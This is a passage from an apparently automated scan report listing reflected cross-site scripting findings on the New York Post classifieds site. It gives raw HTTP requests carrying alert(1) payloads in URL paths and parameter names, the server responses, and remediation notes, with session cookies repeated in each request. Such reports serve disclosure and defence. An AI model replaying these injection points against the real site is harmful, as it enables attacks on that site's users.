This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /post2440c"-alert(1)-"c811013299b/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:25:00 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b63c"><script>alert(1)</script>b15499556ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /post4b63c"><script>alert(1)</script>b15499556ff/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:59 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
1.188. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/post/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e01"><script>alert(1)</script>97ca925315f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /post/?13e01"><script>alert(1)</script>97ca925315f=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:58 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5ODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11577
1.189. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/post/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16e1d"-alert(1)-"19c54cf058c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /post/?16e1d"-alert(1)-"19c54cf058c=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:25:00 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11497
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ef82"><script>alert(1)</script>51c27fc46b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pro6ef82"><script>alert(1)</script>51c27fc46b0/register/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:33:21 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwMTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce24"-alert(1)-"558676f4583 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profce24"-alert(1)-"558676f4583/register/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:33:22 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwMjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 110c4"-alert(1)-"06e49108037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pro/register110c4"-alert(1)-"06e49108037/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:33:24 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwNDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe676"><script>alert(1)</script>d1c74ecb45a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pro/registerfe676"><script>alert(1)</script>d1c74ecb45a/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:33:23 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwMzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34569"-alert(1)-"97496bfe908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sale34569"-alert(1)-"97496bfe908/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:53 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d87"><script>alert(1)</script>0f7dd6cf8b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale47d87"><script>alert(1)</script>0f7dd6cf8b8/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:53 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ade76"><script>alert(1)</script>5ea0915938a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /saleade76"><script>alert(1)</script>5ea0915938a/pet/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:48 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d90f7"-alert(1)-"5004df81c40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /saled90f7"-alert(1)-"5004df81c40/pet/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:50 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e868b"-alert(1)-"5f8d12acc2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
